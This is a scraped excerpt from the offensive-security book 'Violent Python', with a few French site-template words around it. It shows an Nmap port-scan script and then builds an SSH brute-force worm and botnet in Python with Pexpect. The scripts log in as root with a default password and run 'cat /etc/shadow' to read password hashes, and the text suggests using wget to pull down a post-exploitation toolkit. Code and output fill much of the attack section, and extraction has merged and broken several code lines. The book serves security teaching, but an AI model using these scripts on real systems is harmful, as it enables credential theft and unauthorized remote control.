• Aucun résultat trouvé


Dans le document Violent Python (Page 52-56)

if (tgtHost == None) | (tgtPorts[0] == None):

print parser.usage exit(0)

for tgtPort in tgtPorts:

nmapScan(tgtHost, tgtPort) if __name__ == '__main__':


Running our script that utilizes Nmap, we notice something interesting about TCP port 1720. The server or a firewall is actually filtering access to TCP port 1720. The port is not necessarily closed as we initially thought. Using a full-fledged scanner like Nmap instead of a single TCP connect scan we were able to discover the filter.

attacker:∼# python nmapScan.py -H -p 21, 1720 [*] tcp/21 open

[*] tcp/1720 filtered


Now that we have constructed a port scanner to find targets, we can begin the task of exploiting the vulnerabilities of each service. The Morris Worm includes forcing common usernames and passwords against the remote shell (RSH) service as one of its three attack vectors. In 1988, RSH provided an excellent (although not very secure) method for a system administrator to remotely connect to a machine and manage it by performing a series of terminal com-mands on the host. The Secure Shell (SSH) protocol has since replaced RSH by combining RSH with a public-key cryptographic scheme in order to secure the traffic. However, this does very little to stop the same attack vector by forcing out common user names and passwords. SSH Worms have proven to be very successful and common attack vectors. Take a look at the intrusion detection system (IDS) log from our very own www.violentpython.org for a recent SSH attack. Here, the attacker has attempted to connect to the machine using the accounts ucla, oxford, and matrix. These are interesting choices. Luckily for us, the IDS prevented further SSH login attempts from the attacking IP address after noticing its trend to forcibly produce the passwords.

Received From: violentPython->/var/log/auth.log

Rule: 5712 fired (level 10) -> "SSHD brute force trying to get access to the system."

Portion of the log(s):

Oct 13 23:30:30 violentPython sshd[10956]: Invalid user ucla from

Oct 13 23:30:29 violentPython sshd[10954]: Invalid user ucla from

Oct 13 23:30:29 violentPython sshd[10952]: Invalid user oxford from

Oct 13 23:30:28 violentPython sshd[10950]: Invalid user oxford from

Oct 13 23:30:28 violentPython sshd[10948]: Invalid user oxford from

Oct 13 23:30:27 violentPython sshd[10946]: Invalid user matrix from

Oct 13 23:30:27 violentPython sshd[10944]: Invalid user matrix from

Interacting with SSH Through Pexpect

Lets implement our own automated SSH Worm that brute forces user creden-tials against a target. Because SSH clients require user interaction, our script must be able to wait and match for an expected output before sending further input commands. Consider the following scenario. In order to connect to our SSH machine at IP Address,, the application first asks us to confirm the RSA key fingerprint. In this case, we must answer, “yes” before continuing.

Next, the application asks us to enter a password before granting us a com-mand prompt. Finally, we execute our comcom-mand uname –v to determine the kernel version running on our target.

attacker$ ssh root@

The authenticity of host ' (' can't be established.

RSA key fingerprint is 5b:bd:af:d6:0c:af:98:1c:1a:82:5c:fc:5c:39:a3:68.

Are you sure you want to continue connecting (yes/no)? yes

Warning: Permanently added '' (RSA) to the list of known hosts.


Last login: Mon Oct 17 23:56:26 2011 from localhost attacker:∼ uname -v

Darwin Kernel Version 11.2.0: Tue Aug 9 20:54:00 PDT 2011;


In order to automate this interactive console, we will make use of a third party Python module named Pexpect (available to download at http://pexpect.

sourceforge.net). Pexpect has the ability to interact with programs, watch for expected outputs, and then respond based on expected outputs. This makes it an excellent tool of choice for automating the process of brute forcing SSH user credentials.

Building an SSH BotNet with Python 43

Examine the function connect(). This function takes a username, hostname, and password and returns an SSH connection resulting in an SSH spawned connection. Utilizing the pexpect library, it then waits for an expected output.

Three possible expected outputs can occur—a timeout, a message indicating that the host has a new public key, or a password prompt. If a timeout occurs, then the session.expect() method returns to zero. The following selection statement notices this and prints an error message before returning. If the child.expect() method catches the ssh_newkey message, it returns a 1. This forces the function to send a message ‘yes’ to accept the new key. Follow-ing this, the function waits for the password prompt before sendFollow-ing the SSH password.

import pexpect

PROMPT = ['# ', '>>> ', '> ', '\$ ']

def send_command(child, cmd):

child.sendline(cmd) child.expect(PROMPT) print child.before

def connect(user, host, password):

ssh_newkey = 'Are you sure you want to continue connecting' connStr = 'ssh ' + user + '@' + host

child = pexpect.spawn(connStr)

ret = child.expect([pexpect.TIMEOUT, ssh_newkey, \ '[P|p]assword:'])

if ret == 0:

print '[-] Error Connecting' return

if ret == 1:


ret = child.expect([pexpect.TIMEOUT, \ '[P|p]assword:'])

if ret == 0:

print '[-] Error Connecting' return

child.sendline(password) child.expect(PROMPT) return child

Once authenticated, we can now use a separate function command() to send commands to the SSH session. The function command() takes an SSH session

and command string as input. It then sends the command string to the session and waits for the command prompt. After catching the command prompt, it prints this output from the SSH session.

import pexpect

PROMPT = ['# ', '>>> ', '> ', '\$ ']

def send_command(child, cmd):

child.sendline(cmd) child.expect(PROMPT) print child.before

Wrapping everything together, we now have a script that can connect and con-trol the SSH session interactively.

import pexpect

PROMPT = ['# ', '>>> ', '> ', '\$ ']

def send_command(child, cmd):

child.sendline(cmd) child.expect(PROMPT) print child.before

def connect(user, host, password):

ssh_newkey = 'Are you sure you want to continue connecting' connStr = 'ssh ' + user + '@' + host

child = pexpect.spawn(connStr)

ret = child.expect([pexpect.TIMEOUT, ssh_newkey, \ '[P|p]assword:'])

if ret == 0:

print '[-] Error Connecting' return

if ret == 1:


ret = child.expect([pexpect.TIMEOUT, \ '[P|p]assword:'])

if ret == 0:

print '[-] Error Connecting' return

child.sendline(password) child.expect(PROMPT) return child

def main():

Building an SSH BotNet with Python 45

host = 'localhost' user = 'root' password = 'toor'

child = connect(user, host, password)

send_command(child, 'cat /etc/shadow | grep root') if __name__ == '__main__':


Running the script, we see we can connect to an SSH server to remotely control a host. While we ran the simple command to displaying the hashed password for the root user from /etc/shadow file, we could use the tool to something more devious like using wget to download a post exploitation toolkit. You can start an SSH server on Backtrack by generating ssh-keys and then starting the SSH service. Try starting the SSH server and connecting to it with the script.

attacker# sshd-generate

Generating public/private rsa1 key pair.


attacker# service ssh start ssh start/running, process 4376 attacker# python sshCommand.py cat /etc/shadow | grep root



Dans le document Violent Python (Page 52-56)